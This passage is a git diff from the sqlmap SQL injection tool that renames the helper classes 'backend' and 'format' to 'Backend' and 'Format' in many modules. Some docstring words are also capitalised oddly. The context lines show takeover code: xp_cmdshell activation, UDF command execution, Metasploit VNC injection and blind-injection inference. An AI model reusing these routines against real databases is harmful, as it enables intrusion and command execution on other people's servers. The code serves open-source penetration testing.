- 3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
- fingerprint phase.
- """
-
- return kb.htmlFp
-
- @staticmethod
- def getIdentifiedDbms():
- dbms = None
-
- if backend.getForcedDbms() is not None:
- dbms = backend.getForcedDbms()
- elif backend.getDbms() is not None:
- dbms = kb.dbms
- elif conf.dbms is not None:
- dbms = conf.dbms
- elif len(backend.getErrorParsedDBMSes()) > 0:
- dbms = backend.getErrorParsedDBMSes()[0]
-
- return aliasToDbmsEnum(dbms)
-
- @staticmethod
- def getVersion():
- if len(kb.dbmsVersion) > 0:
- return kb.dbmsVersion[0]
- else:
- return None
-
- @staticmethod
- def getVersionList():
- if len(kb.dbmsVersion) > 0:
- return kb.dbmsVersion
- else:
- return None
-
- # Comparison methods
- @staticmethod
- def isDbms(dbms):
- return backend.getDbms() is not None and backend.getDbms() == aliasToDbmsEnum(dbms)
-
- @staticmethod
- def isDbmsWithin(aliases):
- return backend.getDbms() is not None and backend.getDbms().lower() in aliases
-
- @staticmethod
- def isVersion(version):
- return backend.getVersion() is not None and backend.getVersion() == version
-
- @staticmethod
- def isVersionWithin(versionList):
- if backend.getVersionList() is None:
- return False
-
- for dbmsVersion in backend.getVersionList():
- if dbmsVersion == UNKNOWN_DBMS_VERSION:
- continue
- elif dbmsVersion in versionList:
- return True
-
- return False
-
- @staticmethod
- def isVersionGreaterOrEqualThan(version):
- return backend.getVersion() is not None and str(backend.getVersion()) >= str(version)
-
def showHttpErrorCodes():
"""
Shows all HTTP error codes raised till now
diff --git a/lib/core/option.py b/lib/core/option.py
index 4b7110ded..01ce63e6f 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -24,7 +24,7 @@ from extra.clientform.clientform import ParseResponse
from extra.keepalive import keepalive
from extra.xmlobject import xmlobject
from lib.controller.checks import checkConnection
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
@@ -595,7 +595,7 @@ def __setDBMS():
dbmsRegExp = re.search("%s ([\d\.]+)" % firstRegExp, conf.dbms, re.I)
if dbmsRegExp:
- backend.setVersion(str(dbmsRegExp.group(2)))
+ Backend.setVersion(str(dbmsRegExp.group(2)))
if conf.dbms not in SUPPORTED_DBMS:
errMsg = "you provided an unsupported back-end database management "
@@ -1255,7 +1255,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
def __saveCmdline():
"""
Saves the command line options on a sqlmap configuration INI file
- format.
+ Format.
"""
if not conf.saveCmdline:
diff --git a/lib/core/session.py b/lib/core/session.py
index 0609edf24..f4ce4b087 100644
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -9,8 +9,8 @@ See the file 'doc/COPYING' for copying permission
import re
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import dataToSessionFile
from lib.core.common import getFilteredPageContent
from lib.core.common import readInput
@@ -91,9 +91,9 @@ def setDbms(dbms):
if dbmsRegExp:
dbms = dbmsRegExp.group(1)
- backend.setDbms(dbms)
+ Backend.setDbms(dbms)
- logger.info("the back-end DBMS is %s" % backend.getDbms())
+ logger.info("the back-end DBMS is %s" % Backend.getDbms())
def setOs():
"""
@@ -120,15 +120,15 @@ def setOs():
return
if "type" in kb.bannerFp:
- kb.os = format.humanize(kb.bannerFp["type"])
+ kb.os = Format.humanize(kb.bannerFp["type"])
infoMsg = "the back-end DBMS operating system is %s" % kb.os
if "distrib" in kb.bannerFp:
- kb.osVersion = format.humanize(kb.bannerFp["distrib"])
+ kb.osVersion = Format.humanize(kb.bannerFp["distrib"])
infoMsg += " %s" % kb.osVersion
if "sp" in kb.bannerFp:
- kb.osSP = int(format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", ""))
+ kb.osSP = int(Format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", ""))
elif "sp" not in kb.bannerFp and kb.os == "Windows":
kb.osSP = 0
@@ -195,11 +195,11 @@ def resumeConfKb(expression, url, value):
test = readInput(message, default="N")
if not test or test[0] in ("n", "N"):
- backend.setDbms(dbms)
- backend.setVersionList(dbmsVersion)
+ Backend.setDbms(dbms)
+ Backend.setVersionList(dbmsVersion)
else:
- backend.setDbms(dbms)
- backend.setVersionList(dbmsVersion)
+ Backend.setDbms(dbms)
+ Backend.setVersionList(dbmsVersion)
elif expression == "OS" and url == conf.url:
os = unSafeFormatString(value[:-1])
@@ -236,7 +236,7 @@ def resumeConfKb(expression, url, value):
if '.' in table:
db, table = table.split('.')
else:
- db = "%s%s" % (backend.getIdentifiedDbms(), METADB_SUFFIX)
+ db = "%s%s" % (Backend.getIdentifiedDbms(), METADB_SUFFIX)
logMsg = "resuming brute forced table name "
logMsg += "'%s' from session file" % table
@@ -251,7 +251,7 @@ def resumeConfKb(expression, url, value):
if '.' in table:
db, table = table.split('.')
else:
- db = "%s%s" % (backend.getIdentifiedDbms(), METADB_SUFFIX)
+ db = "%s%s" % (Backend.getIdentifiedDbms(), METADB_SUFFIX)
logMsg = "resuming brute forced column name "
logMsg += "'%s' for table '%s' from session file" % (colName, table)
diff --git a/lib/core/shell.py b/lib/core/shell.py
index 064b6912b..2a7186ef3 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -12,7 +12,7 @@ import os
import rlcompleter
from lib.core import readlineng as readline
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
@@ -35,7 +35,7 @@ def loadHistory():
def queriesForAutoCompletion():
autoComplQueries = {}
- for item in queries[backend.getIdentifiedDbms()]._toflat():
+ for item in queries[Backend.getIdentifiedDbms()]._toflat():
if item._has_key('query') and len(item.query) > 1 and item._name != 'blind':
autoComplQueries[item.query] = None
diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py
index 246943219..a57a37954 100644
--- a/lib/core/unescaper.py
+++ b/lib/core/unescaper.py
@@ -7,12 +7,12 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.datatype import advancedDict
class Unescaper(advancedDict):
def unescape(self, expression, quote=True, dbms=None):
- identifiedDbms = backend.getIdentifiedDbms()
+ identifiedDbms = Backend.getIdentifiedDbms()
if not expression:
return expression
diff --git a/lib/core/xmldump.py b/lib/core/xmldump.py
index 31f814ff6..0bbe70818 100644
--- a/lib/core/xmldump.py
+++ b/lib/core/xmldump.py
@@ -76,7 +76,7 @@ ENTITIES = {'"':'"',"'":"'"}
class XMLDump:
'''
- This class purpose is to dump the data into an xml format.
+ This class purpose is to dump the data into an xml Format.
The format of the xml file is described in the scheme file xml/sqlmap.xsd
'''
@@ -118,7 +118,7 @@ class XMLDump:
def __createTextNode(self,data):
'''
Creates a text node with utf8 data inside.
- The text is escaped to an fit the xml text format.
+ The text is escaped to an fit the xml text Format.
'''
if data is None :
return self.__doc.createTextNode(u'')
@@ -129,7 +129,7 @@ class XMLDump:
def __createAttribute(self,attrName,attrValue):
'''
Creates an attribute node with utf8 data inside.
- The text is escaped to an fit the xml text format.
+ The text is escaped to an fit the xml text Format.
'''
attr = self.__doc.createAttribute(attrName)
if attrValue is None :
diff --git a/lib/parse/banner.py b/lib/parse/banner.py
index 9c90d2a72..8e14a8963 100644
--- a/lib/parse/banner.py
+++ b/lib/parse/banner.py
@@ -13,7 +13,7 @@ from xml.sax.handler import ContentHandler
from lib.core.common import checkFile
from lib.core.common import getCompiledRegex
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import parseXmlFile
from lib.core.common import sanitizeStr
from lib.core.data import kb
@@ -97,13 +97,13 @@ def bannerParser(banner):
xmlfile = None
- if backend.getIdentifiedDbms() == DBMS.MSSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL:
xmlfile = paths.MSSQL_XML
- elif backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL:
xmlfile = paths.MYSQL_XML
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
xmlfile = paths.ORACLE_XML
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
xmlfile = paths.PGSQL_XML
if not xmlfile:
@@ -111,7 +111,7 @@ def bannerParser(banner):
checkFile(xmlfile)
- if backend.getIdentifiedDbms() == DBMS.MSSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL:
handler = MSSQLBannerHandler(banner, kb.bannerFp)
parseXmlFile(xmlfile, handler)
diff --git a/lib/request/direct.py b/lib/request/direct.py
index 8b1b42b7a..be98cdbe6 100644
--- a/lib/request/direct.py
+++ b/lib/request/direct.py
@@ -9,7 +9,7 @@ See the file 'doc/COPYING' for copying permission
from lib.core.agent import agent
from lib.core.common import dataToSessionFile
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getUnicode
from lib.core.convert import base64pickle
from lib.core.convert import base64unpickle
@@ -26,7 +26,7 @@ def direct(query, content=True):
select = True
query = agent.payloadDirect(query)
- if backend.getIdentifiedDbms() == DBMS.ORACLE and query.startswith("SELECT ") and " FROM " not in query:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE and query.startswith("SELECT ") and " FROM " not in query:
query = "%s FROM DUAL" % query
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
diff --git a/lib/request/inject.py b/lib/request/inject.py
index edbcd791a..ff4fd1eb7 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -11,7 +11,7 @@ import re
import time
from lib.core.agent import agent
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import cleanQuery
from lib.core.common import dataToSessionFile
@@ -54,7 +54,7 @@ def __goInference(payload, expression, charsetType=None, firstChar=None, lastCha
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
- if (conf.eta or conf.threads > 1) and backend.getIdentifiedDbms() and not timeBasedCompare:
+ if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not timeBasedCompare:
_, length, _ = queryOutputLength(expression, payload)
else:
length = None
@@ -140,7 +140,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)
rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I)
- if rdbRegExp and backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ if rdbRegExp and Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
expressionFieldsList = [expressionFields]
if len(expressionFieldsList) > 1:
@@ -155,14 +155,14 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
# forge the SQL limiting the query output one entry per time
# NOTE: I assume that only queries that get data from a table
# can return multiple entries
- if fromUser and " FROM " in expression.upper() and ((backend.getIdentifiedDbms() not in FROM_TABLE) or (backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]))):
- limitRegExp = re.search(queries[backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
+ if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_TABLE) or (Backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]))):
+ limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
- if limitRegExp or (backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -170,10 +170,10 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if limitRegExp:
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -185,7 +185,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
stopLimit = int(topLimit.group(1))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
limitCond = False
else:
limitCond = True
@@ -199,23 +199,23 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
# From now on we need only the expression until the " LIMIT "
# (or similar, depending on the back-end DBMS) word
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
stopLimit += startLimit
- untilLimitChar = expression.index(queries[backend.getIdentifiedDbms()].limitstring.query)
+ untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
expression = expression[:untilLimitChar]
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
stopLimit += startLimit
if not stopLimit or stopLimit <= 1:
- if backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
+ if Backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
test = False
else:
test = True
if test:
# Count the number of SQL query entries output
- countFirstField = queries[backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
+ countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
countedExpression = expression.replace(expressionFields, countFirstField, 1)
if re.search(" ORDER BY ", expression, re.I):
@@ -309,8 +309,8 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
return outputs
- elif backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper():
- expression += FROM_TABLE[backend.getIdentifiedDbms()]
+ elif Backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper():
+ expression += FROM_TABLE[Backend.getIdentifiedDbms()]
outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)
returnValue = ", ".join([output for output in outputs])
@@ -492,7 +492,7 @@ def goStacked(expression, silent=False):
if conf.direct:
return direct(expression), None
- comment = queries[backend.getIdentifiedDbms()].comment.query
+ comment = queries[Backend.getIdentifiedDbms()].comment.query
query = agent.prefixQuery("; %s" % expression)
query = agent.suffixQuery("%s;%s" % (query, comment))
payload = agent.payload(newValue=query)
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index 0d16c3d18..69d29de13 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
from lib.core.data import conf
@@ -41,10 +41,10 @@ class Abstraction(Web, UDF, xp_cmdshell):
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
self.webBackdoorRunCmd(cmd)
- elif backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ elif Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
self.udfExecCmd(cmd, silent=silent)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
self.xpCmdshellExecCmd(cmd, silent=silent)
else:
@@ -55,10 +55,10 @@ class Abstraction(Web, UDF, xp_cmdshell):
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
return self.webBackdoorRunCmd(cmd)
- elif backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ elif Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
return self.udfEvalCmd(cmd, first, last)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
return self.xpCmdshellEvalCmd(cmd, first, last)
else:
@@ -93,13 +93,13 @@ class Abstraction(Web, UDF, xp_cmdshell):
logger.info(infoMsg)
else:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
infoMsg = "going to use injected sys_eval and sys_exec "
infoMsg += "user-defined functions for operating system "
infoMsg += "command execution"
logger.info(infoMsg)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
infoMsg = "going to use xp_cmdshell extended procedure for "
infoMsg += "operating system command execution"
logger.info(infoMsg)
@@ -151,9 +151,9 @@ class Abstraction(Web, UDF, xp_cmdshell):
warnMsg += "the session user is not a database administrator"
logger.warn(warnMsg)
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
self.udfInjectSys()
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
if mandatory:
self.xpCmdshellInit()
else:
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index d00783273..9018514a2 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -19,7 +19,7 @@ from subprocess import PIPE
from subprocess import Popen as execute
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getLocalIP
from lib.core.common import getRemoteIP
from lib.core.common import getUnicode
@@ -187,13 +187,13 @@ class Metasploit:
if __payloadStr == "windows/vncinject":
choose = False
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, it is likely that the the VNC "
debugMsg += "injection will be successful"
logger.debug(debugMsg)
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
choose = True
warnMsg = "by default PostgreSQL on Windows runs as "
@@ -201,12 +201,12 @@ class Metasploit:
warnMsg += "injection will be successful"
logger.warn(warnMsg)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
choose = True
warnMsg = "it is unlikely that the VNC injection will be "
warnMsg += "successful because usually Microsoft SQL Server "
- warnMsg += "%s runs as Network Service " % backend.getVersion()
+ warnMsg += "%s runs as Network Service " % Backend.getVersion()
warnMsg += "or the Administrator is not logged in"
logger.warn(warnMsg)
@@ -230,12 +230,12 @@ class Metasploit:
break
elif choice == "1":
- if backend.getIdentifiedDbms() == DBMS.PGSQL:
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL:
logger.warn("beware that the VNC injection might not work")
break
- elif backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
break
elif not choice.isdigit():
@@ -555,7 +555,7 @@ class Metasploit:
# This is useful for sqlmap because on PostgreSQL it is not
# possible to write files bigger than 8192 bytes abusing the
# lo_export() feature implemented in sqlmap.
- if backend.getIdentifiedDbms() == DBMS.PGSQL:
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL:
self.__fileFormat = "exe-small"
else:
self.__fileFormat = "exe"
@@ -657,7 +657,7 @@ class Metasploit:
self.__forgeMsfConsoleResource()
self.__forgeMsfConsoleCmd()
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self.__randFile)
else:
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)
diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py
index 1764b46dc..d6baae45d 100644
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -11,7 +11,7 @@ import os
from lib.core.agent import agent
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
from lib.core.data import conf
@@ -51,7 +51,7 @@ class UDF:
def __checkExistUdf(self, udf):
logger.info("checking if UDF '%s' already exist" % udf)
- query = agent.forgeCaseStatement(queries[backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
+ query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
exists = inject.getValue(query, resumeValue=False, unpack=False, charsetType=2)
if exists == "1":
@@ -104,7 +104,7 @@ class UDF:
return output
def udfCheckNeeded(self):
- if ( not conf.rFile or ( conf.rFile and backend.getIdentifiedDbms() != DBMS.PGSQL ) ) and "sys_fileread" in self.sysUdfs:
+ if ( not conf.rFile or ( conf.rFile and Backend.getIdentifiedDbms() != DBMS.PGSQL ) ) and "sys_fileread" in self.sysUdfs:
self.sysUdfs.pop("sys_fileread")
if not conf.osPwn:
@@ -143,9 +143,9 @@ class UDF:
if udf in self.udfToCreate and udf not in self.createdUdf:
self.udfCreateFromSharedLib(udf, inpRet)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
supportTblType = "longtext"
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
supportTblType = "text"
self.udfCreateSupportTbl(supportTblType)
@@ -156,8 +156,8 @@ class UDF:
self.udfInjectCore(self.sysUdfs)
def udfInjectCustom(self):
- if backend.getIdentifiedDbms() not in ( DBMS.MYSQL, DBMS.PGSQL ):
- errMsg = "UDF injection feature is not yet implemented on %s" % backend.getIdentifiedDbms()
+ if Backend.getIdentifiedDbms() not in ( DBMS.MYSQL, DBMS.PGSQL ):
+ errMsg = "UDF injection feature is not yet implemented on %s" % Backend.getIdentifiedDbms()
raise sqlmapUnsupportedFeatureException(errMsg)
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
@@ -236,9 +236,9 @@ class UDF:
else:
logger.warn("you need to specify the name of the UDF")
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
defaultType = "string"
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
defaultType = "text"
self.udfs[udfName]["input"] = []
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index fc31964f5..5a4e261b7 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -7,7 +7,7 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import wasLastRequestDelayed
@@ -30,7 +30,7 @@ class xp_cmdshell:
def __xpCmdshellCreate(self):
cmd = ""
- if backend.isVersionWithin(("2005", "2008")):
+ if Backend.isVersionWithin(("2005", "2008")):
logger.debug("activating sp_OACreate")
cmd += "EXEC master..sp_configure 'show advanced options', 1; "
@@ -49,7 +49,7 @@ class xp_cmdshell:
cmd += "EXEC sp_OADestroy @ID'; "
cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
- if backend.isVersionWithin(("2005", "2008")):
+ if Backend.isVersionWithin(("2005", "2008")):
cmd += " RECONFIGURE WITH OVERRIDE;"
inject.goStacked(cmd)
@@ -81,7 +81,7 @@ class xp_cmdshell:
return cmd
def __xpCmdshellConfigure(self, mode):
- if backend.isVersionWithin(("2005", "2008")):
+ if Backend.isVersionWithin(("2005", "2008")):
cmd = self.__xpCmdshellConfigure2005(mode)
else:
cmd = self.__xpCmdshellConfigure2000(mode)
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 50e177039..2c4f5cd0c 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -12,7 +12,7 @@ import time
import traceback
from lib.core.agent import agent
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import dataToSessionFile
from lib.core.common import dataToStdout
from lib.core.common import decodeIntToUnicode
@@ -75,7 +75,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
elif ( isinstance(lastChar, basestring) and lastChar.isdigit() ) or isinstance(lastChar, int):
lastChar = int(lastChar)
- if backend.getDbms():
+ if Backend.getDbms():
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
@@ -125,7 +125,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
hintlock.release()
if hintValue is not None and len(hintValue) >= idx:
- if backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB):
+ if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB):
posValue = hintValue[idx-1]
else:
posValue = ord(hintValue[idx-1])
@@ -459,7 +459,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# check it via equal against the substring-query output
if commonPattern is not None:
# Substring-query containing equals commonPattern
- subquery = queries[backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern))
+ subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern))
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
query = agent.suffixQuery(query)
diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py
index 3f3e4ef00..b0cd102af 100644
--- a/lib/techniques/brute/use.py
+++ b/lib/techniques/brute/use.py
@@ -15,7 +15,7 @@ from lib.core.common import dataToSessionFile
from lib.core.common import dataToStdout
from lib.core.common import filterListValue
from lib.core.common import getFileItems
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getPageTextWordsSet
from lib.core.common import popValue
from lib.core.common import pushValue
@@ -32,7 +32,7 @@ from lib.core.session import safeFormatString
from lib.request import inject
def tableExists(tableFile, regex=None):
- tables = getFileItems(tableFile, lowercase=backend.getIdentifiedDbms() in (DBMS.ACCESS), unique=True)
+ tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS), unique=True)
retVal = []
infoMsg = "checking table existence using items from '%s'" % tableFile
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index cb6b32823..edecf9127 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -14,7 +14,7 @@ from lib.core.agent import agent
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToSessionFile
from lib.core.common import extractRegexResult
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import initTechnique
from lib.core.common import isNumPosStrValue
from lib.core.common import randomInt
@@ -40,7 +40,7 @@ def __oneShotErrorUse(expression, field):
check = "%s(?P.*?)%s" % (kb.misc.start, kb.misc.stop)
nulledCastedField = agent.nullAndCastField(field)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
# Fix for MySQL odd behaviour ('Subquery returns more than 1 row')
nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))")
@@ -143,14 +143,14 @@ def errorUse(expression, expected=None, resumeValue=True, dump=False):
# entry per time
# NOTE: I assume that only queries that get data from a table can
# return multiple entries
- if " FROM " in expression.upper() and ((backend.getIdentifiedDbms() not in FROM_TABLE) or (backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]))) and "EXISTS(" not in expression.upper():
